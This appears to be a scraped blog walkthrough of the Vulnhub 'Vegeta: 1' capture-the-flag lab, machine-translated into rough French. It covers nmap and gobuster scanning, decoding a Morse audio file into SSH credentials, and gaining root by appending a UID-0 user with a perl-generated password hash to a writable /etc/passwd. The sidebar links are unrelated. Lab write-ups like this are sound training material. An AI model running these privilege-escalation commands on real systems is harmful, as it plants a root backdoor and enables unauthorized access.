当前位置:网站首页>Vulnhub Vegeta: 1
Vulnhub Vegeta: 1
2022-06-24 22:47:00 【Androméda】
Idées d'infiltration:
nmapScan----gobusterNumériser le catalogue du site----Décodage en ligne du Morse,Je l'ai.sshNom d'utilisateur Mot de passe----/etc/passwdÉcrire l'autorisation de l'utilisateur
Information sur l'environnement:
Cible:192.168.101.77
Machine d'attaque:192.168.101.34
Étapes spécifiques:
1、nmapScan
sudo nmap -sV -sC -p- 192.168.101.77
2、dirbNumériser le catalogue du site(Bunny hole)
dirb http://192.168.101.77
Découvertehttp://192.168.101.77/robots.txt
(Il y a un trou de lapin)
Accès au navigateurhttp://192.168.101.77/robots.txt,Découverte/find_me
Accès au navigateur/find_me,Cliquez surfind_me.html,Et voir le code source de la page
view-source:http://192.168.101.77/find_me/find_me.html
Tirez vers le bas pour trouver un grand commentaire ( Ça ne sert à rien de copier et coller )
base64 Après le décodage, il y a encore un tas de codes inutiles ,La route est bloquée
3、gobusterNumériser le catalogue du site
gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Scan to/bulma
http://192.168.101.77/bulma/C'est un catalogue.,Il y a un dossierhahahaha.wav
Télécharger pour écouter , On dirait un code Morse
4、Décodage en ligne du Morse,Je l'ai.sshNom d'utilisateur Mot de passe
J'ai trouvé un traducteur en ligne :Morse Code Audio Decoder | Morse Code World
Appuyez.uploadTéléchargerhahahaha.wav,Et appuyez surplay, Conversion automatique en message texte
Le résultat est
USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)
Par nom d'utilisateurtrunks,Mot de passeu$3rEn courssshConnexion
ssh [email protected]
5、/etc/passwd Écrire une nouvelle demande d'utilisateur
Voir/home/trunks/.bash_history, Il y a une direction. /etc/passwd Écrire une action pour un nouvel utilisateur
Voir/etc/passwdPermissions de fichier pour
ls -al /etc/passwd
DécouvertetrunksL'utilisateur a la permission d'écrire
RÉFÉRENCES/home/trunks/.bash_historyCommandes dans,D'abord.perl Générer un mot de passe utilisateur chiffré
perl -le 'print crypt("123456","addedsalt")'
Dans la commande ci - dessus, Le mot de passe en texte clair de l'utilisateur est 123456
Puis le nouvel utilisateur testÉcrire/etc/passwd
echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd
Enfin passer àtestUtilisateurs,Saisissez le mot de passe123456,ObtenirrootAutorité,Et dans/rootTrouvé dans le catalogueroot.txt
su - test
边栏推荐
- NIO 零拷贝
- 【ROS玩转Turtlesim小海龟】
- Rip protocol of dynamic routing protocol
- 软件设计的七大原则
- ThreadLocal内存泄漏问题
- String exercise summary 2
- Valueerror: cannot take a larger sample than population when 'replace=false‘
- Yyds dry goods inventory junit5 learning II: assumptions class
- 别再乱用了,这才是 @Validated 和 @Valid 的真正区别!!!
- Can AI chat robots replace manual customer service?
猜你喜欢
Tetris
结合源码剖析Oauth2分布式认证与授权的实现流程
别再乱用了,这才是 @Validated 和 @Valid 的真正区别!!!
【Mongodb】READ_ME_TO_RECOVER_YOUR_DATA,数据库被恶意删除
O (n) complexity hand tear sorting interview questions | an article will help you understand counting sorting
Yyds dry goods inventory junit5 learning II: assumptions class
High level application of SQL statements in MySQL database (II)
软件设计的七大原则
Technology inventory: past, present and future of Message Oriented Middleware
AQS源码分析
随机推荐
Problem solving - nested lists
Memory alignment of structures
Relationnet++: a representation of fusion of multiple detection targets based on transformer | neurips 2020
OSPF basic content
Principles of Ethernet port mirroring, link aggregation and VLAN Technology
别再乱用了,这才是 @Validated 和 @Valid 的真正区别!!!
Rip protocol of dynamic routing protocol
NIO 零拷贝
堆內存分配的並發問題
证件照处理
find your present (2)
Huada 04A operating mode / low power consumption mode
[QT] QT event handling
String exercise summary 2
【软件工程】期末重点
NiO zero copy
Data communication foundation - Ethernet port mirroring and link aggregation
堆内存分配的并发问题
Web security XSS foundation 06
Technology inventory: past, present and future of Message Oriented Middleware